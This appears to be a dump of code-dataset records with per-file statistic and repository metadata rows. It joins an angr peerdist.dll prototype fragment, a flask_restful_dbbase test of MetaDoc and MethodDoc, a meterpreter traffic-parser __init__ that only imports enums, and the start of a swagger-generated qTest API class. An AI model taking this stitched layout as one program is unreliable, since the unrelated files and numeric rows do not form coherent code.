        'PeerDistClientCancelAsyncOperation': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "pOverlapped"]),
        # PeerDistGetStatusEx(hPeerDist, pPeerDistStatus) -> UInt32
        'PeerDistGetStatusEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "status": SimTypeInt(signed=False, label="PEERDIST_STATUS"), "dwMinVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE"), "dwMaxVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE")}, name="PEERDIST_STATUS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "pPeerDistStatus"]),
        # PeerDistRegisterForStatusChangeNotificationEx(hPeerDist, hCompletionPort, ulCompletionKey, lpOverlapped, pPeerDistStatus) -> UInt32
        'PeerDistRegisterForStatusChangeNotificationEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "status": SimTypeInt(signed=False, label="PEERDIST_STATUS"), "dwMinVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE"), "dwMaxVer": SimTypeInt(signed=False, label="PEERDIST_RETRIEVAL_OPTIONS_CONTENTINFO_VERSION_VALUE")}, name="PEERDIST_STATUS_INFO", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hCompletionPort", "ulCompletionKey", "lpOverlapped", "pPeerDistStatus"]),
        # PeerDistGetOverlappedResult(lpOverlapped, lpNumberOfBytesTransferred, bWait) -> Int32 (BOOL)
        'PeerDistGetOverlappedResult': SimTypeFunction([SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["lpOverlapped", "lpNumberOfBytesTransferred", "bWait"]),
        # PeerDistServerOpenContentInformationEx(hPeerDist, cbContentIdentifier, pContentIdentifier, ullContentOffset, cbContentLength, pRetrievalOptions, hCompletionPort, ulCompletionKey, phContentInfo) -> UInt32
        'PeerDistServerOpenContentInformationEx': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeLongLong(signed=False, label="UInt64"), SimTypeLongLong(signed=False, label="UInt64"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "dwContentInfoMinVersion": SimTypeInt(signed=False, label="UInt32"), "dwContentInfoMaxVersion": SimTypeInt(signed=False, label="UInt32"), "dwReserved": SimTypeInt(signed=False, label="UInt32")}, name="PEERDIST_RETRIEVAL_OPTIONS", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "cbContentIdentifier", "pContentIdentifier", "ullContentOffset", "cbContentLength", "pRetrievalOptions", "hCompletionPort", "ulCompletionKey", "phContentInfo"]),
        # PeerDistClientGetInformationByHandle(hPeerDist, hContentHandle, PeerDistClientInfoClass, dwBufferSize, lpInformation) -> UInt32
        'PeerDistClientGetInformationByHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="PEERDIST_CLIENT_INFO_BY_HANDLE_CLASS"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPeerDist", "hContentHandle", "PeerDistClientInfoClass", "dwBufferSize", "lpInformation"]),
    }
# Attach the prototype table to the SimLibrary so angr can resolve calls
# into peerdist.dll with correct signatures.
lib.set_prototypes(prototypes)
| 307.358974
| 1,536
| 0.743514
| 2,536
| 23,974
| 6.97358
| 0.062303
| 0.172802
| 0.116709
| 0.182301
| 0.889059
| 0.88069
| 0.875035
| 0.868759
| 0.866101
| 0.864744
| 0
| 0.015297
| 0.070159
| 23,974
| 77
| 1,537
| 311.350649
| 0.778037
| 0.001168
| 0
| 0
| 0
| 0
| 0.253475
| 0.051155
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.119048
| 0
| 0.119048
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
99789d706d7e2b2f0e906c1512f9f8901cb866e0
| 49,493
|
py
|
Python
|
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | 1
|
2020-07-23T00:53:20.000Z
|
2020-07-23T00:53:20.000Z
|
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | null | null | null |
tests/test_doc_utils.py
|
Cider-Security-Demo/millennium-falcon
|
bf9409c7a7842ac7b67a41ebd68f4b5e9d51f490
|
[
"MIT"
] | null | null | null |
# tests/test_dbbase_resource.py
import pytest
from dbbase import DB
from flask_restful_dbbase.doc_utils import MetaDoc, MethodDoc
from flask_restful_dbbase.resources import (
ModelResource,
CollectionModelResource,
MetaResource,
)
def test_create_doc():
db = DB("sqlite///:memory:")
class Author(db.Model):
__tablename__ = "author"
id = db.Column(db.Integer, primary_key=True)
first_name = db.Column(db.String(50), nullable=False)
last_name = db.Column(db.String(50), nullable=False)
def full_name(self):
return f"{self.first_name} {self.last_name}"
books = db.relationship("Book", backref="author", lazy="joined")
class Book(db.Model):
__tablename__ = "book"
id = db.Column(db.Integer, nullable=True, primary_key=True)
isbn = db.Column(db.String(20), nullable=True)
title = db.Column(db.String(100), nullable=False)
pub_year = db.Column(db.Integer, nullable=False)
author_id = db.Column(
db.Integer, db.ForeignKey("author.id"), nullable=False
)
class Job(db.Model):
__tablename__ = "job"
id = db.Column(db.Integer, nullable=True, primary_key=True)
job_name = db.Column(db.String(100), nullable=False)
class MultipleKey(db.Model):
__tablename__ = "mult_key"
id1 = db.Column(db.Integer, nullable=True, primary_key=True)
id2 = db.Column(db.Integer, nullable=True, primary_key=True)
db.create_all()
class AuthorResource(ModelResource):
model_class = Author
serial_fields = {"post": {Job: ["id", "job_name"]}}
class AuthorCollectionResource(CollectionModelResource):
model_class = Author
class AuthorMetaResource(MetaResource):
resource_class = AuthorResource
class AuthorCollectionMetaResource(MetaResource):
resource_class = AuthorCollectionResource
with pytest.raises(ValueError) as err:
MetaDoc(resource_class=AuthorResource, methods="potato")
assert str(err.value) == "methods must be a dictionary"
meta_doc = MetaDoc(resource_class=AuthorResource)
assert meta_doc.resource_class == AuthorResource
assert meta_doc.model_class == Author._class()
assert meta_doc.url_prefix == AuthorResource.url_prefix
assert meta_doc.base_url == AuthorResource.create_url()
assert meta_doc.methods == {}
assert meta_doc.table is None
post_method_doc = MethodDoc(method="post")
assert post_method_doc.input is None
assert post_method_doc.input_modifier is None
assert post_method_doc.before_commit is None
assert post_method_doc.after_commit is None
assert post_method_doc.responses == []
post_method_doc.input_modifier = "this describes the input_modifier"
post_method_doc.before_commit = "this describes the before_commit"
post_method_doc.after_commit = "this describes the after_commit"
assert post_method_doc.to_dict(meta_doc) == {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"input_modifier": "this describes the input_modifier",
"before_commit": "this describes the before_commit",
"after_commit": "this describes the after_commit",
"responses": [
{
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"jobName": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
}
}
],
}
# shows a job returned
meta_doc.methods["post"] = post_method_doc
assert meta_doc.to_dict() == {
"modelClass": "Author",
"urlPrefix": "/",
"baseUrl": "/authors",
"methods": {
"get": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"post": {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"input_modifier": "this describes the input_modifier",
"before_commit": "this describes the before_commit",
"after_commit": "this describes the after_commit",
"responses": [
{
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"jobName": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
}
}
],
},
"put": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"patch": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
},
"delete": {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [{}],
},
},
"table": {
"Author": {
"type": "object",
"properties": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"first_name": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"last_name": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"full_name": {"readOnly": True},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pub_year": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"author_id": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"xml": "Author",
}
},
}
get_method_doc = MethodDoc(method="get")
put_method_doc = MethodDoc(method="put")
patch_method_doc = MethodDoc(method="patch")
delete_method_doc = MethodDoc(method="delete")
assert get_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [
{
"fields": {
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
}
}
],
}
assert put_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"fullName": {"readOnly": True},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
}
}
],
}
assert patch_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [
{
"fields": {
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"fullName": {"readOnly": True},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
}
}
],
}
assert delete_method_doc.to_dict(meta_doc=meta_doc) == {
"url": "/authors/<int:id>",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"responses": [{}],
}
# test collections
collection_meta_doc = MetaDoc(resource_class=AuthorCollectionResource)
get_method_doc = MethodDoc(method="get")
assert get_method_doc.to_dict(meta_doc=collection_meta_doc) == {
"url": "/authors",
"requirements": [],
"queryString": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
}
},
"jobParams": {
"orderBy": {"type": "string", "list": True},
"maxPageSize": {"type": "integer"},
"offset": {"type": "integer"},
"debug": {"type": "boolean"},
},
"responses": [
{
"fields": {
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
"fullName": {"readOnly": True},
}
}
],
}
# multiple keys
class MultKeyResource(ModelResource):
model_class = MultipleKey
assert MethodDoc._get_input_keys(MultKeyResource) == [
{
"id1": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
}
},
{
"id2": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
}
},
]
# custom response
method_doc = MethodDoc(
"post",
use_default_response=False,
responses=[{"message": "a unique response"}],
)
MetaDoc(
resource_class=MultKeyResource,
methods={method_doc.method: method_doc},
)
assert method_doc.to_dict(meta_doc) == {
"url": "/authors",
"requirements": [],
"input": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": False,
"info": {},
},
"firstName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"lastName": {
"type": "string",
"maxLength": 50,
"nullable": False,
"info": {},
},
"books": {
"readOnly": False,
"relationship": {
"type": "list",
"entity": "Book",
"fields": {
"id": {
"type": "integer",
"format": "int32",
"primary_key": True,
"nullable": True,
"info": {},
},
"isbn": {
"type": "string",
"maxLength": 20,
"nullable": True,
"info": {},
},
"title": {
"type": "string",
"maxLength": 100,
"nullable": False,
"info": {},
},
"pubYear": {
"type": "integer",
"format": "int32",
"nullable": False,
"info": {},
},
"authorId": {
"type": "integer",
"format": "int32",
"nullable": False,
"foreign_key": "author.id",
"info": {},
},
},
},
},
},
"responses": [{"message": "a unique response"}],
}
| 38.940205
| 74
| 0.233104
| 2,078
| 49,493
| 5.445621
| 0.072666
| 0.118328
| 0.123188
| 0.134146
| 0.830594
| 0.809297
| 0.788088
| 0.762902
| 0.745758
| 0.738158
| 0
| 0.01741
| 0.657649
| 49,493
| 1,270
| 75
| 38.970866
| 0.650437
| 0.00196
| 0
| 0.713936
| 0
| 0
| 0.16066
| 0
| 0
| 0
| 0
| 0
| 0.017115
| 1
| 0.00163
| false
| 0
| 0.00326
| 0.000815
| 0.031785
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
514abcf4fabd1bc6b4fbf2b8bd4063052ba55c22
| 118
|
py
|
Python
|
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | 1
|
2021-12-22T15:14:54.000Z
|
2021-12-22T15:14:54.000Z
|
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | null | null | null |
src/meterpreter_traffic_parser/enums/__init__.py
|
SpartaEN/meterpreter-traffic-parser
|
5681c3973ac8fc3bbd478c82fdc27de4ab6c447a
|
[
"MIT"
] | null | null | null |
from .packet_meta_type import PacketMetaType
from .tlv_type import TLVType
from .packet_tlv_type import PacketTLVType
| 29.5
| 44
| 0.872881
| 17
| 118
| 5.764706
| 0.529412
| 0.306122
| 0.265306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.101695
| 118
| 3
| 45
| 39.333333
| 0.924528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5a9ef7bb7d438786f419ff3aba9fcea91eab0a93
| 12,543
|
py
|
Python
|
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/common_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CommonApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
